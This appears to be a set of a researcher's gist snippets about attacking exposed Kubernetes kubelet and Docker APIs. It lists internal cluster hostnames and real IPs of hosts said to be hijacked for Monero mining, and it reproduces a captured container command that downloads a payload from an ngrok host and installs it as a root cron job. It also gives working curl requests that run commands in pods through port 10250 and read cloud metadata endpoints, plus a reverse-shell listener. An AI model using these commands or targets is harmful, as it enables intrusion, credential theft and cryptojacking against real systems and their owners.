random-robbie

https://api.internal.3ds-servicebuilder.com
https://api.internal.aaron.aaron.slalomdev.io
https://api.internal.abhishek.k8s.local
https://api.internal.alboom.k8s.local
https://api.internal.aob-stemcell-prod.k8s.local
https://api.internal.automation.darwin.ngiris.io
https://api.internal.blockguru.us
https://api.internal.bqc-qsefe.k8s.local
https://api.internal.c1-k8s.aws.storageos.net
https://api.internal.cluster.lorentzca.me

random-robbie

The following is appearing in 108 kubernetes systems that i have tracked so far.

"containers": [
                    {
                        "command": [
                            "sh",
                            "-c",

random-robbie

Hijacked Systems

All the following IPs have the docker API exposed and have been hijacked to mine XMR

101.132.125.134
101.251.243.178

random-robbie

"18.208.0.0/13", "52.95.245.0/24", "52.194.0.0/15", "54.155.0.0/16", "54.196.0.0/15", "52.94.22.0/24", "52.95.255.112/28", "13.210.0.0/15", "52.94.17.0/24", "52.95.154.0/23", "52.95.212.0/22", "54.239.0.240/28", "54.241.0.0/16", "184.169.128.0/17", "216.182.224.0/21", "52.74.0.0/16", "54.168.0.0/16", "54.239.54.0/23", "52.119.224.0/21", "52.219.64.0/22", "54.238.0.0/16", "216.182.232.0/22", "52.92.72.0/22", "172.96.98.0/24", "13.125.0.0/16", "13.248.24.0/22", "54.193.0.0/16", "52.95.104.0/22", "52.119.249.0/24", "52.92.64.0/22", "52.93.5.0/24", "52.144.193.128/26", "54.250.0.0/16", "107.20.0.0/14", "52.93.8.0/22", "52.94.224.0/20", "52.46.224.0/20", "52.95.156.0/24", "54.180.0.0/15", "52.30.0.0/15", "52.94.8.0/24", "52.94.249.64/28", "54.92.0.0/17", "54.154.0.0/16", "67.202.0.0/18", "103.246.148.0/23", "52.93.20.17/32", "52.95.0.0/20", "205.251.246.0/24", "52.94.248.112/28", "52.92.39.0/24", "52.95.150.0/24", "52.219.60.0/23", "52.94.198.32/28", "54.232.0.0/16", "52.93.249.0/24", "207.171.160.0/20", "52.92.48

random-robbie

{
  "updated": "2018-09-10 18:07:50",
  "type": "http path",
  "duration": "24 hours",
  "data": [
    {
      "path": "/",
      "position": 1
    },
    {

random-robbie

[
  {
    "Id": "33bac08a2c3b6cf7190f9c82b610d03ad88d43790e6ac03ea9b5eb2956006737",
    "Names": [
      "/mystifying_kilby1"
    ],
    "Image": "sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265",
    "ImageID": "sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265",
    "Command": "/bin/sh -c 'curl --retry 3 -m 60 -o /tmpbb2716/tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd \"http://4e69fa7d.ngrok.io/f/serve?l=d&r=c3cdca1d8e60925a08dc612c426a936f\";echo \"* * * * * root sh /tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd\" >/tmpbb2716/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd\" >/tmpbb2716/etc/cron.d/1m;chroot /tmpbb2716 sh -c \"cron || crond\"'",
    "Created": 1534969253,

random-robbie

How to connect to Digital Ocean Metadata endpoint

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "cmd=busybox wget -q -O - curl http://169.254.169.254/metadata/v1/"

random-robbie

Grabbing Namespace and POD and container from kubernetes API.

{
      "metadata": {
        "name": "spinnaker-k8spray-clouddriver-566c56787c-l6mnj",
        "namespace": "k8spray",
        "uid": "e36e6e6e-8974-11e8-9663-02ceba770664",
        "creationTimestamp": null

random-robbie

How to get reverse shell

Setup a listener on your VPS to connect back to

nc -lvp 4444

random-robbie

How to connect to AWS Metadata endpoint

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "cmd=busybox wget -q -O - http://169.254.169.254/latest/meta-data/"